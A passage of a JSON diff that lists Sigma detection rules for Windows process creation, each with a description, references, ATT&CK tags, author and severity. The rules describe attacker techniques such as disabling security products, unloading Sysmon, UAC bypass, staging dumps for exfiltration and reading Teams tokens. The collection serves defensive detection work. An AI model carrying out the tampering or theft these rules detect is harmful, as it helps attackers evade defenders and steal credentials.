"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/03/05", + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands that temporarily turn off Volume Snapshots", + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": 
"2021/01/28", + "filename": "proc_creation_win_susp_volsnap_disable.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "uuid": "43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "meta": { + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/10/30", + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "author": "bohops", + "level": "medium", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/05/02", + "filename": 
"proc_creation_win_susp_webdav_client_execution.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags", + "creation_date": "2022/08/26", + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "proc_creation_win_susp_wermgr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": 
"Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_where_execution.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution", + "meta": { + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2018/08/13", + "filename": "proc_creation_win_susp_whoami.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly", + "meta": { + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2021/08/12", + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter", + "meta": { + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ], + "creation_date": "2021/11/29", + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/01/04", + "filename": "proc_creation_win_susp_winrar_dmp.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/11/17", + "filename": "proc_creation_win_susp_winrar_execution.yml", + "author": "Florian Roth, Tigzy", + "level": "high", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "meta": { + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via Winrm.vbs", + "meta": { + "refs": [ + "https://twitter.com/bohops/status/994405551751815170", + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": 
"2020/10/07", + "filename": "proc_creation_win_susp_winrm_execution.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use for administartive purposes. Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2021/07/27", + "filename": "proc_creation_win_susp_winzip.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation", + "meta": { + "refs": [ + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2021/06/25", + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate 
software creating script event consumers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", + "value": "Suspicious WMIC Execution", + "meta": { + "refs": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "car.2016-03-002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_wmic_execution.yml", + "author": "Michael Haag, Florian Roth, juju4, oscd.community", + "level": "medium", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate", + "meta": { + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + 
"level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product", + "meta": { + "refs": [ + "https://twitter.com/cglyer/status/1355171195654709249", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/01/30", + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", + "value": "Execution via WorkFolders.exe", + "meta": { + "refs": [ + "https://twitter.com/elliotkillick/status/1449812843772227588", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/10/21", + "filename": "proc_creation_win_susp_workfolders.yml", + "author": "Maxime Thiebaut (@0xThiebaut)", + "level": "high", + "falsepositive": [ + "Legitimate usage of the uncommon Windows Work Folders feature." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via the Windows Update client (wuauclt)", + "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "value": "Windows Update Client LOLBIN", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_susp_wuauclt.yml", + "author": "FPT.EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "value": "Suspicious Windows Update Agent Empty Cmdline", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/26", + "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1451237393017839616", + "https://github.com/Tylous/ZipExec", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/11/07", + "filename": "proc_creation_win_susp_zipexec.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "proc_creation_win_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", + "value": "Suspicious Auditpol Usage", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" + ], + "tags": 
[ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2021/02/02", + "filename": "proc_creation_win_sus_auditpol_usage.yml", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "level": "high", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2017/08/28", + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", + "author": "Markus Neis", + "level": "low", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", + "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", + "value": "Use of Sysinternals PsService", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2022/06/16", + "filename": "proc_creation_win_sysinternals_psservice.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of PsService by an administrator" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load", + "meta": { + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect possible Sysmon driver unload", + "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "value": "Sysmon Driver Unload", + "meta": { + "refs": [ + "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_sysmon_driver_unload.yml", + "author": "Kirill Kiryanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", + "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "value": "Suspicious Sysmon as Execution Parent", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", + "https://twitter.com/filip_dragovic/status/1590052248260055041", + "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + ], + "tags": "No established tags", + "creation_date": "2022/11/10", + "filename": "proc_creation_win_sysmon_exploitation.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", + "value": "UAC Bypass via Event Viewer", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/19", + "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "value": "Process Creation Using Sysnative Folder", + "meta": { + "refs": [ + 
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + ], + "tags": [ + "attack.t1055" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_sysnative.yml", + "author": "Max Altgelt", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly", + "meta": { + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2017/11/27", + "filename": "proc_creation_win_system_exe_anomaly.yml", + "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Exotic software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": 
"proc_creation_win_tamper_defender_remove_mppreference.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "uuid": "99793437-3e16-439b-be0f-078782cf953d", + "value": "Tap Installer Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_tap_installer_execution.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", + "value": "Taskkill Symantec Endpoint Protection", + "meta": { + "refs": [ + "https://www.exploit-db.com/exploits/37525", + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/13", + "filename": "proc_creation_win_taskkill_sep.yml", + "author": "Ilya Krestinichev, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion", + "meta": { + "refs": [ + "https://twitter.com/subTee/status/1216465628946563073", + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" + ], + "creation_date": "2020/01/13", + "filename": "proc_creation_win_task_folder_evasion.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "value": "Suspicious Command With Teams Objects Pathes", + "meta": { + "refs": [ + 